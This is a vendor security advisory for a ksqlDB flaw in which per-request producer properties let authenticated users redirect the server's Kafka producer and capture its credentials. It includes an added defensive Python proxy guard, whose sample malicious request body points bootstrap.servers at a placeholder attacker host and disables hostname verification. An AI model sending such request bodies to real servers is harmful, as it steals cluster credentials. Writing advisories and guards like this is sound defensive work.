Impacted versions:
- Confluent Platform versions earlier than 8.2.1, 8.1.3, 8.0.5, 7.9.7, 7.8.8, 7.7.9, 7.6.11, 7.5.14 and 7.4.15 on their respective release lines
- Confluent Cloud ksqlDB managed clusters
Recommended action:
- Confluent Cloud customers do not need to take any action. Confluent has patched all impacted ksqlDB managed clusters.
- Confluent Platform customers should upgrade to the latest patched release versions.
Issue:
ksqlDB allows authenticated users to override the server's internal Kafka producer configuration through REST API requests, enabling exfiltration of the cluster's Kafka credentials to an attacker-controlled server.
ksqlDB permits users to supply configuration properties alongside REST API requests. Because these properties are not validated, user-supplied Kafka producer properties, including bootstrap.servers, are applied to the server's own internal Kafka producer. An authenticated user with privileges to submit ksqlDB queries can therefore point this producer at an attacker-controlled Kafka endpoint, and ksqlDB transmits its internal Kafka credentials to that endpoint during the connection handshake.
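The following is an added example, not code from the advisory or from ksqlDB: a request guard of the kind a reverse proxy in front of an unpatched server could apply, which rejects /ksql or /query bodies whose streamsProperties try to set bootstrap.servers or any SASL/SSL/security.protocol property. The sample request bodies are constructed, and the config-namespacing prefixes the guard strips ("ksql.streams.", "producer.", "consumer.", "admin.") are assumptions about how ksqlDB and Kafka Streams scope client configs; adjust them to what your version actually accepts.

```python
"""Added example (not ksqlDB's own code): deny per-request overrides of
Kafka connection and credential properties in ksqlDB REST bodies.

Models the advisory's issue: a POST to /ksql or /query carrying a
"streamsProperties" object that redirects the server's internal producer.
"""
import json

# Client properties a caller must never be able to set per request:
# where the client connects, and how it authenticates.
DENIED_EXACT = {"bootstrap.servers", "security.protocol"}
DENIED_PREFIXES = ("sasl.", "ssl.")

# Assumed namespacing prefixes accepted for client configs (assumption about
# ksqlDB / Kafka Streams behaviour; verify against your version).
STRIP_PREFIXES = ("ksql.streams.", "producer.", "consumer.", "admin.")


def normalize_key(key):
    """Strip config namespacing so 'ksql.streams.producer.bootstrap.servers'
    and 'producer.bootstrap.servers' both compare as 'bootstrap.servers'.
    Lower-cases the key so case variation cannot slip past the denylist."""
    k = key.strip().lower()
    changed = True
    while changed:
        changed = False
        for prefix in STRIP_PREFIXES:
            if k.startswith(prefix):
                k = k[len(prefix):]
                changed = True
    return k


def is_denied(key):
    """True if the (normalized) key is a connection or credential property."""
    k = normalize_key(key)
    return k in DENIED_EXACT or k.startswith(DENIED_PREFIXES)


def check_request(body):
    """Return (allowed, offending_keys) for a ksqlDB /ksql or /query body.
    Malformed bodies and a non-object streamsProperties are rejected."""
    try:
        doc = json.loads(body)
    except ValueError:
        return False, ["<malformed json>"]
    props = doc.get("streamsProperties") or {}
    if not isinstance(props, dict):
        return False, ["<streamsProperties not an object>"]
    bad = sorted(k for k in props if is_denied(k))
    return len(bad) == 0, bad


# Constructed sample request bodies (not captured traffic).
BENIGN = json.dumps({
    "ksql": "SELECT * FROM pageviews EMIT CHANGES;",
    "streamsProperties": {"ksql.streams.auto.offset.reset": "earliest"},
}).encode()

MALICIOUS = json.dumps({
    "ksql": "CREATE STREAM s AS SELECT * FROM pageviews;",
    "streamsProperties": {
        # Redirect the internal producer to a host the attacker controls
        # (placeholder hostname) and disable hostname verification.
        "ksql.streams.producer.bootstrap.servers": "attacker.example:9092",
        "producer.ssl.endpoint.identification.algorithm": "",
    },
}).encode()

if __name__ == "__main__":
    for name, req in (("benign", BENIGN), ("malicious", MALICIOUS)):
        allowed, keys = check_request(req)
        print(f"{name}: {'allow' if allowed else 'deny'} {keys}")
```

A denylist is the quickest thing to bolt onto a proxy, but an allowlist of the handful of properties callers legitimately need (for example auto.offset.reset) is the stronger design, since it also blocks any connection-affecting property this list does not anticipate. Neither replaces upgrading to a patched release.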
Impact:
The Kafka credentials used by ksqlDB clusters are typically configured by customers when provisioning the ksqlDB cluster and are used to access the underlying Kafka cluster. Customers are expected to scope these credentials to the least privileges required for ksqlDB operations.
If a customer has configured Kafka credentials with elevated privileges, an authenticated user able to override bootstrap.servers can exfiltrate those credentials and use them to perform unauthorized actions against the underlying Kafka cluster outside of ksqlDB, potentially escalating privileges beyond what the ksqlDB authorization model permits.
As a defense-in-depth measure, customers should review the privileges granted to the Kafka credentials configured for ksqlDB clusters and ensure they follow least-privilege principles.
Remediation:
- Confluent Platform: this issue is resolved in Confluent Platform 8.2.1, 8.1.3, 8.0.5, 7.9.7, 7.8.8, 7.7.9, 7.6.11, 7.5.14 and 7.4.15; upgrade to the patched release for your release line.
- Confluent Cloud: managed ksqlDB clusters have already been patched and no further action is necessary.
CVSS Scores:
- Confluent Cloud: CVSS v3.1 score 6.6
- Confluent Platform: CVSS v3.1 score 5.9